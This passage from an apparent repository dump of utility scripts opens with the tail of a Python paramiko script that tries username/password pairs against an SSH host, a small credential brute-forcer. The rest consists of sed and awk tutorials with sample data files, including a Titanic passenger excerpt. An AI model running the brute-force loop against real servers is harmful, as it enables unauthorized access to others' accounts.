32 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 33 | 34 | for username, password in lst: 35 | try: 36 | client.connect(host, username=username, password=password) 37 | print("[+] Success! ", username, " / ", password) 38 | break 39 | except socket.gaierror: 40 | print("invalid host!") 41 | break 42 | except paramiko.AuthenticationException: 43 | print("[-] Failure: ", username, "/", password) 44 | -------------------------------------------------------------------------------- /sed-awk/README.md: -------------------------------------------------------------------------------- 1 | Sed & Awk Programming 2 | ============== 3 | 4 | - [Sed Tutorial](sed_tutorial.md) 5 | 6 | - [Awk Tutorial](awk_tutorial.md) 7 | -------------------------------------------------------------------------------- /sed-awk/awk-workflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/sed-awk/awk-workflow.png -------------------------------------------------------------------------------- /sed-awk/awk_soup: -------------------------------------------------------------------------------- 1 | # 1. print the sum of nth column 2 | awk -F "\t" -n n=1 '{sum+=$n}END{print sum}' file 3 | awk '{sum += $1};END {print sum}' test 4 | 5 | # 2. print all the columns, exclude vth column 6 | awk -F "\t" -v v=3 '{ 7 | len=split($0,arr,"\t"); 8 | for(i=1;i$v?max:$v;min=min<$v?min:$v}END{print max,min}' file 18 | 19 | # 4. display all different values in one column 20 | awk -v v=1 'BEGIN{FS="\t"}{a[$v]=1;sum=0} END{for(i in a) sum+=a[i];print sum}' file 21 | 22 | # 5. delete the repeated row 23 | awk '!a[$0]++' file 24 | awk '!a[$0]++' tmp > tmp1 25 | 26 | # 6. matrix transposition 27 | awk -F "\t" '{for(i=1;i<=NF;i++){a[FNR,i]=$i}}END{for(i=1;i<=NF;i++){for(j=1;j<=FNR;j++){printf a[j,i]"\t"}print ""}}' file | sed 's/[ \t]*$//' | sed '$d' 28 | 29 | # 7. delete the last row in the file 30 | sed '$d' file.txt 31 | 32 | # 8. delete the white space in the tail 33 | sed 's/[ \t]*$//' lr_predict_tmp > lr_predict_tmp1 34 | sed 's/[ \t]*$//' tmp3 > test2 35 | 36 | # 9. let the null value to be 0 37 | awk -F "\t" '{for (i=1;i<=NF;i++) if($i=="") $i=0; print $0}' OFS="\t" tt > tt2​ 38 | 39 | # 10. merge the column of same ession 40 | awk 'BEGIN{FS=" "} {map[$1]=map[$1]$NF" "} END{for(i in map)print i,map[i]}' tmp1 > tmp2 41 | #awk 'BEGIN{FS=OFS=" "} {map[$1]=map[$1]$NF" "} END{for(i in map)print i,map[i]}' tmp > tmp1 42 | 43 | # 11. compare src with lr_predict, and get the section 44 | awk 'NR==FNR{a[$0]++} NR>FNR&&a[$0]' src lr_predict > lr_predict_output 45 | # src2 46 | # s1 A B 47 | # s1 A C 48 | # s1 A E 49 | # s2 B D 50 | # s2 B E 51 | # s2 B F 52 | # s3 A B 53 | # s3 A D 54 | # s4 E A 55 | # predict 56 | # A B 57 | # A C 58 | # A D 59 | # B C 60 | # B D 61 | # C E 62 | # C F 63 | # C G 64 | awk 'NR==FNR{a[$1,$2]=1} NR>FNR&&a[$2,$3]' lr_predict src2 > lr_predict_output2 65 | 66 | -------------------------------------------------------------------------------- /sed-awk/awk_tutorial.md: -------------------------------------------------------------------------------- 1 | 2 | # Awk Tutorial 3 | ============== 4 | 5 | - [Awk Syntax and Basic Commands](#sed-syntax-and-basic-commands) 6 | - [Awk Built-in Variables](#awk-built-in-variables) 7 | - [Awk Variables and Operators](#awk-variables-and-operators) 8 | - [Awk Conditional Statements and Loops](#awk-conditional-statements-and-loops) 9 | - [Awk Associative Arrays](#awk-associative-arrays) 10 | - [Additional Awk Commands](#additional-awk-commands) 11 | - [AWK Cheat Sheet](https://github.com/pkrumins/awk-cheat-sheet/blob/master/awk.cheat.sheet.txt) 12 | 13 |
14 |
15 |
16 | 17 | ### Awk Syntax and Basic Commands 18 | 19 | [[back to top](#awk-tutorial)] 20 | 21 | Awk is a powerful languge to manipulate and process text files. It is especially helpful when the lines in a text files are in a record format, i.e., when each line (record) contains multiple fields separated by a delimiter. 22 | 23 | #### 1. Awk Command Syntax 24 | 25 | **Basic Awk Syntax:** 26 | 27 | ```awk 28 | awk -Fs '/pattern/ {action}' input-file 29 | (or) 30 | awk -Fs '{action}' input-file 31 | ``` 32 | 33 | - **F** is the field separator. If you don't specify, it will use an empty space as field delimiter. 34 | 35 | - The `/pattern/` and the `{action}` should be enclosed inside single quotes. 36 | 37 | - `/pattern/` is optional, If you specify a pattern, awk will process only those records from the input-file that match the given pattern. If you don't, it will process all the records from the input-file. 38 | 39 | - `{action}`, it can be one or multiple awk commands. 40 | 41 | - input-file, the input file needs to be processed. 42 | 43 | ```awk 44 | $ awk -F: '/mail/ {print $1}' /etc/passwd 45 | $ awk -F ":" '/mail/ {print $1}' /etc/passwd 46 | ``` 47 | 48 | - **-F:** or **-F ":"**, indicates that the field separator in the input-file is colon :. 49 | 50 | - /mail/, awk will process only the records that contains the keyword mail. 51 | 52 | - {print $1}, this action block contains only one awk command, that prints the 1st field of the record that matches the pattern "mail". 53 | 54 | - /etc/passwd - input file. 55 | 56 | You can specify awk commands in an awk script file: 57 | 58 | ``` 59 | awk -Fs -f myscript.awk input-file 60 | ``` 61 | 62 | #### 2. Awk Program Structure 63 | 64 | A typical awk program has following three blocks: BEGIN, body and END. 65 | 66 | - BEGIN Block (optional) 67 | 68 | ``` 69 | BEGIN {awk-commands} 70 | ``` 71 | 72 | The begin block gets executed only once at the beginning, before awk starts executing the body block for all the lines in the input file. 73 | 74 | - The begin block is a good place to print report headers, and initialize variables. 75 | 76 | - You can have one or more awk commands in the begin awk. 77 | 78 | - Body Block 79 | 80 | ``` 81 | /pattern/ {action} 82 | ``` 83 | 84 | The body block gets executed once for every line in the input file. i.e., the input file has 10 records, the commands in the body block will be executed 10 tme. 85 | 86 | - END Block 87 | 88 | ``` 89 | END {awk-commands} 90 | ``` 91 | 92 | The end block gets executed only once at the end, after awk completes executing the body block for all the lines in the input-file. 93 | 94 | - The end block is a good place to print a report footer and do any clean-up activities. 95 | 96 | - You can have one or more awk commands in the end block. 97 | 98 | ![](awk-workflow.png) 99 | 100 | Image Source: Sed and Awk 101 Hacks 101 | 102 | For example: 103 | 104 | ``` 105 | $ awk 'BEGIN { FS=":"; print "---header---"} /mail/ {print $1} END { print "---footer---"}' /etc/passwd 106 | ``` 107 | 108 | You can also execute the command line from script file: 109 | 110 | ``` 111 | $ vi test.awk 112 | BEGIN { 113 | FS=":"; 114 | print "---header---" 115 | } 116 | /mail/ { 117 | print $1 118 | } 119 | END { 120 | print "---footer---" 121 | } 122 | ``` 123 | 124 | ``` 125 | $ awk -f test.awk /etc/passwd 126 | ``` 127 | 128 | #### 3. Print Command 129 | 130 | By default, the awk print command prints the full record, it is equivalent to `cat` command. 131 | 132 | ``` 133 | $ awk '{print}' titanic.txt 134 | 135 | # PassengerId Survived Pclass Name Sex Age SibSp Parch Ticket Fare Cabin Embarked 136 | 137 | # show all lists 138 | awk '{print $0}' titanic.txt 139 | 140 | # show name and age 141 | awk '{print $4, $6}' titanic.txt 142 | 143 | # field number 4 indicates: Name 144 | $ awk '{print $4 }' titanic.txt 145 | ``` 146 | 147 | #### 4. Pattern Matching 148 | 149 | ```awk 150 | # print the names and sex 151 | $ awk '/male/ {print $4, $5}' titanic.txt 152 | 153 | # print Id from 10 - 19 name and sex 154 | awk '/^1/ {print $4,"\t", $5}' titanic.txt 155 | 156 | # filter the name including William 157 | awk '/William/{print $0}' titanic.txt 158 | 159 | # filter the age <= 30 160 | awk '$6<=30{print $0}' titanic.txt 161 | 162 | # regex, start from 10 to 13 163 | awk '/^1[0-3]/{print $0}' titanic.txt 164 | ``` 165 | 166 |
167 |
168 |
169 | 170 | ### Awk Built-in Variables 171 | 172 | [[back to top](#awk-tutorial)] 173 | 174 | #### 1. FS - Input Field Separator 175 | 176 | The default field separator recognized by awk is space. 177 | 178 | ```awk 179 | $ awk -F ',' '{print $1, $2}' items.txt 180 | 181 | $ awk 'BEGIN {FS=","} {print $1, $2}' items.txt 182 | 183 | $ awk 'BEGIN {FS=","; \ 184 | print "--------\nID\tItem\n--------"} \ 185 | {print $1,"\t",$2} \ 186 | END {print "--------"}' items.txt 187 | ``` 188 | 189 | When a file contains different field separators, you can specify multiple field separators using a regular experession. 190 | 191 | ```awk 192 | $ awk 'BEGIN {FS="[,:@]"} {print $1, $2, $5}' items.txt 193 | ``` 194 | 195 | #### 2. OFS - Output Field Separator 196 | 197 | OFS is printed between consecutive fields in the output. By default, awk prints OFS with space. 198 | 199 | ```awk 200 | $ awk -F ',' '{print $1, ":", $2}' items.txt 201 | 202 | $ awk -F ',' 'BEGIN { OFS=":"} { print $2, $3 }' items.txt 203 | ``` 204 | 205 | #### 3. RS - Record Separator 206 | 207 | The default record separator used by awk is new line. 208 | 209 | ```awk 210 | $ awk -F ',' 'BEGIN { RS="@"} { print }' items.txt 211 | 212 | $ awk -F ',' 'BEGIN { RS="@"} { print $1 }' items.txt 213 | ``` 214 | 215 | #### 4. ORS - Output Record Separator 216 | 217 | ```awk 218 | $ awk 'BEGIN {FS="[,:@]"; ORS="\n---\n"} {print $1, $2, $5}' items.txt 219 | 220 | $ awk 'BEGIN {FS="[,:@]"; OFS="\n"; ORS="\n---\n"} {print $1, $2, $5}' items.txt 221 | ``` 222 | 223 | #### 5. NR - Number of Records 224 | 225 | When NR is used inside the loop, this gives the line number. When used in the END block, this gives the total number of records in the file. 226 | 227 | ```awk 228 | $ awk 'BEGIN {FS=","} \ 229 | {print "Item Id of record number", NR, "is", $1;} \ 230 | END {print "Total number of records:", NR}' items.txt 231 | ``` 232 | 233 | #### 6. FILENAME - Current File Name 234 | 235 | This will give you the name of the file Awk is currently processing. 236 | 237 | FILENAME inside the BEGIN block will return empty value "",as the BEGIN block is for the whole awk program, and not for any specific file. 238 | 239 | ```awk 240 | $ awk 'BEGIN {FS=","} {print "Item:", $2; print "Filename:", FILENAME}' items.txt 241 | 242 | # it will return empty value in this example 243 | $ echo "John Smith" | awk '{print "Last name:", $2; \ 244 | print "Filename:", FILENAME}' 245 | ``` 246 | 247 | #### 7. FNR - File "Number of Record" 248 | 249 | When you have two input files, NR keeps growing between multiple files. When the body block starts processing the 2nd file, NR will not be reset to 1, instead it will continue from the last NR number value of the previous file. 250 | 251 | ```awk 252 | # copy the file to test 253 | $ cp items.txt items-1.txt 254 | 255 | # each file has 5 records each, NR continued incrementing after the 1st file is processed. 256 | $ awk 'BEGIN {FS=","} \ 257 | {print FILENAME ": Record Number", NR, "is", $1} \ 258 | END {print "Total number of records:",NR}' items.txt items-1.txt 259 | 260 | # FNR will give you record number within the current file. 261 | # When awk starts the bdoy block 2nd file, FNR will start from 1 again 262 | $ awk 'BEGIN {FS=","} \ 263 | {print FILENAME ": Record Number", FNR, "is", $1} \ 264 | END {print "Total number of records:",NR}' items.txt items-1.txt 265 | ``` 266 | 267 |
268 |
269 |
270 | 271 | ### Awk Variables and Operators 272 | 273 | [[back to top](#awk-tutorial)] 274 | 275 | #### 1. Variables 276 | 277 | ```awk 278 | $ cat variables.awk 279 | BEGIN { 280 | FS="[,:@]" 281 | total=0; 282 | } 283 | { 284 | print $2 "'s price is: " $4; 285 | total=total+$4 286 | } 287 | END { 288 | print "---\nTotal price = $"total; 289 | } 290 | 291 | $ awk -f variables.awk items.txt 292 | ``` 293 | 294 | #### 2. Operators 295 | 296 | - **+**: The number (returns the number itself) 297 | - **-**: Negate the number 298 | - **++**: Auto Increment 299 | - **--**: Auto Decrement 300 | 301 | i.e., `++$2`, `$++` 302 | 303 | Pre means it will add ++ (or --) before the variable name. This will first increase (or decrease) the value of the variable by one, and then execute the rest of the statement in which it is used. 304 | 305 | Post means it will add ++ (or --) after the variable name. This will first execute the containing statement and then increase (or decrease) the value of the variable by one. 306 | 307 | ```awk 308 | # print number of shell users 309 | $ awk -F ':' '$NF ~ /\/bin\/bash/ { n++ }; END { print n }' /etc/passwd 310 | 311 | # print all the even numbered lines 312 | $ awk 'NR %2 == 0' items.txt 313 | 314 | # print the average age 315 | $ awk '{age+=$6};END{print age/(NR-1)}' titanic.txt 316 | 317 | # find the minimal value 318 | $ awk 'NR==2{min=$10}{if($10 pID_age.txt 322 | ``` 323 | 324 | - Regular Expression Operators 325 | 326 | **~** Match operator (not a full match) 327 | 328 | **==** Full Match 329 | 330 | **!~** No Match operator 331 | 332 | ```awk 333 | $ awk -F "," '$2 ~ "iPhone"' items.txt 334 | $ awk -F "," '$2 == "iPhone"' items.txt 335 | ``` 336 | 337 |
338 |
339 |
340 | 341 | ### Awk Conditional Statements and Loops 342 | 343 | [[back to top](#awk-tutorial)] 344 | 345 | #### 1. If Statement 346 | 347 | ``` 348 | if (conditional-expression) 349 | { 350 | action1; 351 | action2; 352 | } 353 | ``` 354 | 355 | ```awk 356 | $ awk 'BEGIN {FS="[,:@]"} \ 357 | {if (($4 >= 300 && $4 <= 800) && ($5 <= 10)) \ 358 | print "Only", $5, "qty of",$2, "is available";}' items.txt 359 | ``` 360 | 361 | ``` 362 | if (conditional-expression) 363 | action1 364 | else 365 | action2 366 | ``` 367 | 368 | Ternary Operator Syntax: 369 | 370 | ``` 371 | conditional-expression ? action1 : action2 ; 372 | ``` 373 | 374 | ```awk 375 | # print concatenated pairs of records 376 | $ awk 'ORS=NR%2? ",":"\n"' items.txt 377 | ``` 378 | 379 | #### 2. While Loop 380 | 381 | ```awk 382 | $ awk 'BEGIN \ 383 | { while (count++<50) string = string "x"; print string }' 384 | ``` 385 | 386 | ```awk 387 | $ awk 'BEGIN{ 388 | count=1; 389 | do 390 | print "This gets printed at least once"; 391 | while(count!=1) 392 | }' 393 | ``` 394 | 395 | #### 3. For Loop 396 | 397 | ```awk 398 | $ echo "1 2 3 4" | awk \ 399 | '{for (i=1; i <= NF; i++) total = total+$i }; \ 400 | END { print total }' 401 | ``` 402 | - Continue Statement 403 | 404 | ```awk 405 | $ awk 'BEGIN { x=1; 406 | while(x<=10) { 407 | if (x==5) { 408 | x++; 409 | continue; 410 | } 411 | print "Value of x", x; x++; 412 | } 413 | }' 414 | ``` 415 | 416 | - Exit Statement 417 | 418 | ```awk 419 | $ awk 'BEGIN { x=1; 420 | while(x<=10) { 421 | if (x==5) { 422 | x++; 423 | exit; 424 | } 425 | print "Value of x", x; x++; 426 | } 427 | }' 428 | ``` 429 | 430 |
431 |
432 |
433 | 434 | ### Awk Associative Arrays 435 | 436 | [[back to top](#awk-tutorial)] 437 | 438 | #### 1. Assigning Array Elements 439 | 440 | ```awk 441 | $ cat arrays.awk 442 | BEGIN { 443 | item[101]="iPhone 6"; 444 | item[102]="MaccBook Air"; 445 | item["na"]="Not Available"; 446 | 447 | for (x in item) 448 | print item[x]; 449 | } 450 | 451 | $ awk -f arrays.awk 452 | ``` 453 | 454 | #### 2. Multi Dimensional Array 455 | 456 | ```awk 457 | $ cat multi-array.awk 458 | BEGIN { 459 | item["1,1"]=10; 460 | item["1,2"]=20; 461 | item["2,1"]=30; 462 | item["2,2"]=40; 463 | 464 | for (x in item) 465 | print item[x]; 466 | } 467 | 468 | $ awk -f multi-array.awk 469 | ``` 470 |
471 |
472 |
473 | 474 | ### Additional Awk Commands 475 | 476 | [[back to top](#awk-tutorial)] 477 | 478 | #### 1. printf 479 | 480 | ```awk 481 | # new line 482 | $ awk 'BEGIN { printf "Line 1\nLine 2\n" }' 483 | # tab 484 | $ awk 'BEGIN \ 485 | { printf "Field 1\tFiled 2\tField 3\tFiled 4\n"}' 486 | # vertical tab 487 | $ awk 'BEGIN \ 488 | { printf "Field 1\vFiled 2\vField 3\vFiled 4\n"}' 489 | # backspace 490 | $ awk 'BEGIN \ 491 | { printf "Field 1\bFiled 2\bField 3\bFiled 4\n"}' 492 | # carriage return 493 | $ awk 'BEGIN \ 494 | { printf "Field 1\rFiled 2\rField 3\rFiled 4\n"}' 495 | ``` 496 | 497 | #### 2. Argument Processing 498 | 499 | ```awk 500 | $ cat arguments.awk 501 | BEGIN { 502 | print "ARGC=",ARGC 503 | for (i = 0; i < ARGC; i++) 504 | print ARGV[i] 505 | } 506 | 507 | $ awk -f arguments.awk arg1 arg2 arg3 arg4 508 | ``` 509 | 510 |
511 |
512 |
513 | 514 | ### Reference 515 | 516 | * [Sed-and-Awk-101-Hacks](https://www.yumpu.com/en/document/view/25827537/sed-and-awk-101-hacks) 517 | -------------------------------------------------------------------------------- /sed-awk/items.txt: -------------------------------------------------------------------------------- 1 | 101,MacBook Air,PC,810@10 2 | 102,Refrigerator,Appliance,900@5 3 | 103,iPhone 7,Phone,700@20 4 | 104,Laser Printer,Office,300@8 5 | 105,Football,Sports,200@15 6 | -------------------------------------------------------------------------------- /sed-awk/sed_tutorial.md: -------------------------------------------------------------------------------- 1 | 2 | # Sed Tutorial 3 | ============== 4 | 5 | - [Sed Syntax](#sed-syntax) 6 | - [Sed Substitute Command](#sed-substitute-command) 7 | - [Regular Expressions](#regular-expressions) 8 | 9 |
10 |
11 |
12 | 13 | ### Sed Syntax 14 | 15 | [[back to top](#sed-tutorial)] 16 | 17 | #### 1. Sed Command Syntax 18 | 19 | Sed stands for Stream Editor. It is very powerful to manipulate filter, and transform text. 20 | 21 | **Basic sed syntax:** 22 | 23 | ```shell 24 | sed [options] {sed-commands} {input-file} 25 | ``` 26 | 27 | For example, it prints all the lines from the /etc/passwd file: 28 | 29 | ```shell 30 | $ sed -n 'p' /etc/passwd 31 | 32 | $ cat test.sed 33 | /^root/ p 34 | /^nobody/ p 35 | $ sed -n -f text.sed /etc/passwd 36 | 37 | $ sed -n -e '/^root/ p' -e '/^nobody/ p' /etc/passwd 38 | 39 | $ sed -n '{ 40 | /^root/ p 41 | /^nobody/ p 42 | }' /etc/passwd 43 | ``` 44 | 45 | #### 2. Print Pattern Space (p command) 46 | 47 | When p is used you will use the -n option to suppress the default printing. Otherwise, when execute p as one of the commands, the line will be printed twice. 48 | 49 | ```shell 50 | # functionally the same as: cat titanic.txt 51 | $ sed -n 'p' titanic.txt 52 | 53 | # print only the 2nd line: 54 | $ sed -n '2 p' titanic.txt 55 | 56 | # print from line 1 through line 4: 57 | $ sed -n '1,4 p' titanic.txt 58 | 59 | # print from line 2 through the last line: 60 | $ sed -n '1,$ p' titanic.txt 61 | 62 | # print lines matching the pattern: William 63 | $ sed -n '/William/ p' titanic.txt 64 | ``` 65 | 66 | #### 3. Delete Lines (d command) 67 | 68 | Using the sed d command, you can delete lines, only deleted from the output stream, doesn't modify the original input file. 69 | 70 | ```shell 71 | # delete only the 2nd line 72 | $ sed '2 d' titanic.txt 73 | 74 | # delete from line 1 through 4 75 | $ sed '2,4 d' titanic.txt 76 | 77 | # delete from line 2 through the last line 78 | # sed '2,$ d' titanic.txt 79 | 80 | # delete lines matching the pattern "William" 81 | $ sed '/William/ d' titanic.txt 82 | 83 | # delete all the empty lines from a file 84 | $ sed '/^$/ d' titanic.txt 85 | 86 | # delete all comment lines (assuming the comment start with #) 87 | $ sed '/^#/ d' titanic.txt 88 | ``` 89 | 90 | #### 4. Write Pattern Space to File (w command) 91 | 92 | ```shell 93 | # write the content of titanic.txt to output.txt and display on screen 94 | $ sed 'w output.txt' titanic.txt 95 | 96 | # write the content of titanic.txt to output.txt but not to screen 97 | $ sed -n 'w output.txt' titanic.txt 98 | 99 | # write only the 2nd line 100 | $ sed -n '2 w output.txt' titanic.txt 101 | 102 | # write lines 1 through 4 103 | $ sed -n '1,4 w output.txt' titanic.txt 104 | 105 | # write from line 2 through the last line 106 | $ sed -n '2,$ w output.txt' titanic.txt 107 | ``` 108 | 109 |
110 |
111 |
112 | 113 | ### Sed Substitute Command 114 | 115 | [[back to top](#sed-tutorial)] 116 | 117 | #### 1. Sed Substitute Command Syntax 118 | 119 | The most powerful command in the stream editor is **s**ubstitute. 120 | 121 | ```shell 122 | sed '[address-range|pattern-range] s/original-streing/replacement-string/[substitute-flags]' inputfile 123 | ``` 124 | 125 | - address-range or pattern-range , substitute-flag is optional. 126 | - s tells Sed to execute the substitute command. 127 | - Note that the original filw is not changed. 128 | 129 | ```shell 130 | # replace all occurrences of William with Fei: 131 | $ sed 's/William/Fei/' titanic.txt 132 | 133 | # replace William with Fei only one lines that contain the keyword: Allen 134 | $ sed '/Allen/s/William/Fei/' titanic.txt 135 | ``` 136 | 137 | #### 2. Global Flag (g flag) 138 | 139 | ```shell 140 | # replace the 1st occurrence of lower case a with upper case A 141 | $ sed 's/a/A/' titanic.txt 142 | 143 | # replace all occurrences of lower case a with upper case A 144 | $ sed 's/a/A/g' titanic.txt 145 | 146 | # replace the 2nd occurrence of lower case a to uppper case A 147 | $ sed 's/a/A/2' titanic.txt 148 | 149 | # change only the 2nd occurrence of titanic to fei 150 | $ sed 's/titanic/fei/2' titanic.txt 151 | ``` 152 | 153 | #### 3. Print Flag (p flag) 154 | 155 | When the substitution is successful, it prints the changed line. 156 | 157 | ```shell 158 | # print only the line that was changed by the substitute command 159 | $ sed -n 's/William/Fei/p' titanic.txt 160 | 161 | # change "titanic" to "fei" and print the result 162 | $ sed -n 's/titanic/fei/2p' titanic.txt 163 | ``` 164 | 165 | #### 4. Write Flag (w flag) 166 | 167 | When the substitution is successful, it writes the changed line to a file. 168 | 169 | ```shell 170 | # write only the line that was changed by the substitute command to output.txt 171 | $ sed -n 's/William/Fei/w output.txt' titanic.txt 172 | 173 | # change "titanic" to "fei", write the result to a file, print all lines 174 | $ sed 's/titanic/fei/2w output.txt' titanic.txt 175 | ``` 176 | 177 | #### 5. Ignore Case Flag (i flag) 178 | 179 | This is available only GNU Sed. 180 | 181 | The sed substitute flag i stands for ignore case. you can use the i flag to match the original-string in a case-insensitive manner. 182 | 183 | ```shell 184 | $ sed -n 's/titanic/fei/i' titanic.txt 185 | ``` 186 | 187 | #### 6. Execute Flag (e flag) 188 | 189 | This is available only in the GNU sed. 190 | 191 | The sed substitute flag e stands for execute. Using the sed e flag, you can execute whatever is available in the pattern space as a shell command, and the output will be returned to the pattern space. 192 | 193 | ```shell 194 | $ cat commands.txt 195 | /etc/passwd 196 | /etc/group 197 | 198 | # add the text "ls -l" in front of every line in the commands.txt and print the output 199 | $ sed 's/^/ls -l /' commands.txt 200 | ls -l /etc/passwd 201 | ls -l /etc/group 202 | 203 | # add the text "ls -l" in front of every line in the commands.txt and execute the output 204 | $ sed 's/^/ls -l /e' commands.txt 205 | ``` 206 | 207 | #### 7. Combine Sed Substitution Flags 208 | 209 | ```shell 210 | # combine g,p and w flags 211 | $ sed -n 's/titanic/fei/gpw output.txt' titanic.txt 212 | ``` 213 | 214 | #### 8. Sed Substitution Delimiter 215 | 216 | ```shell 217 | $ vi path.txt 218 | reading /usr/local/bin directory 219 | 220 | # change /usr/local/bin to /usr/bin using the sed substitute command 221 | $ sed 's/\/usr\/local\/bin/\/usr\/bin/' path.txt 222 | reading /usr/bin directory 223 | 224 | # Also, | or ^ @ ! can be used as substitution delimiter 225 | $ sed 's|/usr/local/bin|/usr/bin|' path.txt 226 | $ sed 's^/usr/local/bin^/usr/bin^' path.txt 227 | $ sed 's@/usr/local/bin@/usr/bin@' path.txt 228 | $ sed 's!/usr/local/bin!/usr/bin!' path.txt 229 | ``` 230 | 231 | #### 9. Multiple Substitute Commands Affecting the Same Line 232 | 233 | ```shell 234 | # change William to Fei Bird, then change Fei to Ken: 235 | $ sed '{ 236 | s/William/Fei Bird/ 237 | s/Fei/Ken/ 238 | }' titanic.txt 239 | ``` 240 | 241 | The sed execution flow: 242 | 243 | 1). Read: Sed reads the line and puts it in the pattern space. 244 | 245 | 2). Execute: Sed executes the 2nd command on the content of the current pattern space after execution of the first command. 246 | 247 | 3). Print: It prints the content of the current pattern space. 248 | 249 | 4). Repeat: it moves on to the next line and repeats from step 1). 250 | 251 | #### 10. Power of & - Get Matched Pattern 252 | 253 | ```shell 254 | # enclose the id between [ and ], i.e. 1 becomes [1], 2 becomes [2], etc. 255 | $ sed 's/^[0-9][0-9]/[&]/g' titanic.txt 256 | 257 | # enclose the whole input line between < and > 258 | $ sed 's/^.*/<&>/' titanic.txt 259 | ``` 260 | 261 | #### 11. Substitution Grouping 262 | 263 | ```shell 264 | # this sed example displays only the first field from the /etc/passwd file, 265 | # \([^:]*\) matches the string up to the 1st colon, 266 | # \1 in the replacement-string replaces the first matched group. i.e. it displays only the username: 267 | $ sed 's/\([^:]*\).*/\1/' /etc/passwd 268 | 269 | # encloses the 1st letter in every word inside (), if the 1st character is upper case. 270 | $ echo "The Geek Stuff" | sed 's/\([A-Z]\)/\(\1\)/g' 271 | (T)he (G)eek (S)tuff 272 | ``` 273 | 274 | #### 12. Sed Script Files 275 | 276 | Add "#!/bin/sed -f" as the 1st line to test.sed file to be as an interpreter 277 | 278 | ```shell 279 | $ vi test.sed 280 | #!/bin/sed -f 281 | # enclose the whole input line between < and > 282 | s/^.*/<&>/ 283 | # replace William with Fei Bird 284 | s/William/Fei Bird/ 285 | # replace Fei with Ken 286 | s/Fei/Ken/ 287 | ``` 288 | 289 | ``` 290 | $ chmod u+x test.sed 291 | $ ./test.sed titanic.txt 292 | ``` 293 | 294 | #### 13. Modifying the Input File Directly 295 | 296 | ```shell 297 | $ sed 's/William/Fei/' titanic.txt > new-titanic.txt 298 | $ mv new-titanic.txt titanic.txt 299 | 300 | # Or use the sed command line option -i 301 | $ sed -i 's/William/Fei/' titanic.txt 302 | 303 | # Sed will make a backup of the original file before writing the new content 304 | $ sed -ibak 's/William/Fei/' titanic.txt 305 | ``` 306 | 307 |
308 |
309 |
310 | 311 | 312 | ### Regular Expressions 313 | 314 | [[back to top](#sed-tutorial)] 315 | 316 | #### 1. Fundamentals 317 | 318 | - Beginning of line (^) 319 | - End of line ($) 320 | - Single Character (.) 321 | - Zero or more Occurrences (*) 322 | - One or more Occurrence(\+) 323 | - Zero or one Occurrence (\?) 324 | - Escaping the Special Character (\) 325 | - Character Class([0-9]) 326 | 327 | 328 | ```shell 329 | # display lines which start with 10: 330 | $ sed -n '/^10/ p' titanic.txt 331 | 332 | # display lines which end with the letter S 333 | $ sed -n '/S$/ p' titanic.txt 334 | ``` 335 | 336 | #### 2. Additional Regular Expressions 337 | 338 | - OR Operation (|) 339 | - Exactly M Occurences ({m}) 340 | - M to N Occurrences ({m,n}) 341 | - Word Boundary (\b) 342 | - Back References (\n) 343 | 344 | ```shell 345 | $ vi numbers.txt 346 | 1234 347 | 12123 348 | 121 349 | 12 350 | 351 | $ sed -n '/[0-9]/ p' numbers.txt 352 | 1234 353 | 12123 354 | 121 355 | 12 356 | 357 | # print lines consisting of exactly 5 digits 358 | $ sed -n '/^[0-9]\{5\}$/ p' numbers.txt 359 | 12123 360 | 361 | # print lines consisting of at least 3 but more than 5 digits 362 | $ sed -n '/^[0-9]\{3,5\}$/ p' numbers.txt 363 | 364 | # match lines containing the whole word Mrs 365 | $ sed -n '/\bMrs\b/ p' titanic.txt 366 | 367 | # match two digit number in which both the digits are same number, i.e. 11, 22, 33 368 | $ sed -n '/\([0-9]\)\1/ p' titanic.txt 369 | ``` 370 | 371 | #### 3. Sed Substitution Using Regular Expression 372 | 373 | ```shell 374 | # replace the last two characters in every line with ",Not Defined" 375 | $ sed 's/..$/,Not Defined/' titanic.txt 376 | 377 | # delete all lines that start with "#" 378 | $ sed 's/#.*// ; /^$/ d' titanic.txt 379 | 380 | $ vi test.html 381 |

Hello World!

382 | 383 | # strip all html tags from test.html 384 | $ sed -e 's/<[^>]*>//g' test.html 385 | 386 | # remove all comments and blank lines[] 387 | $ sed -e 's/#.*//' -e '/^$/ d' /etc/profile 388 | 389 | # convert the DOS file format to Unix file format using sed 390 | $ sed 's/.$//' filename 391 | ``` 392 | 393 |
394 |
395 |
396 | 397 | ### Reference 398 | 399 | * [Sed-and-Awk-101-Hacks](https://www.yumpu.com/en/document/view/25827537/sed-and-awk-101-hacks) 400 | -------------------------------------------------------------------------------- /sed-awk/titanic.txt: -------------------------------------------------------------------------------- 1 | #titanic.txt 2 | PassengerId Survived Pclass Name Sex Age SibSp Parch Ticket Fare Cabin Embarked 3 | 01 0 3 "Braund_Mr.Owen_Harris" male 22 1 0 A/5_21171 7.25 Null S 4 | 02 1 1 "Cumings_Mrs.John_Bradley_(Florence_Briggs_Thayer)" female 38 1 0 PC_17599 71.2833 C85 C 5 | 03 1 3 "Heikkinen_Miss.Laina" female 26 0 0 STON/O2.3101282 7.925 Null S 6 | 04 1 1 "Futrelle_Mrs.Jacques_Heath_(Lily_May_Peel)" female 35 1 0 113803 53.1 C123 S 7 | 05 0 3 "Allen_Mr.William_Henry" male 35 0 0 373450 8.05 Null S 8 | 06 0 3 "Moran_Mr.James" male 34 0 0 330877 8.4583 Null Q 9 | 07 0 1 "McCarthy_Mr.Timothy_J" male 54 0 0 17463 51.8625 E46 S 10 | 08 0 3 "Palsson_Master.Gosta_Leonard" male 2 3 1 349909 21.075 Null S 11 | 09 1 3 "Johnson_Mrs.Oscar_W_(Elisabeth_Vilhelmina_Berg)" female 27 0 2 347742 11.1333 Null S 12 | 10 1 2 "Nasser_Mrs.Nicholas_(Adele_Achem)" female 14 1 0 237736 30.0708 Null C 13 | 11 1 3 "Sandstrom_Miss.Marguerite_Rut" female 4 1 1 PP_9549 16.7 G6 S 14 | 12 1 1 "Bonnell_Miss.Elizabeth" female 58 0 0 113783 26.55 C103 S 15 | 13 0 3 "Saundercock_Mr.William_Henry" male 20 0 0 A/5.2151 8.05 Null S 16 | 14 0 3 "Andersson_Mr.Anders_Johan" male 39 1 5 347082 31.275 Null S 17 | 15 0 3 "Vestrom_Miss.Hulda_Amanda_Adolfina" female 14 0 0 350406 7.8542 Null S 18 | 16 1 2 "Hewlett_Mrs.(Mary_D_Kingcome)_" female 55 0 0 248706 16 Null S 19 | 17 0 3 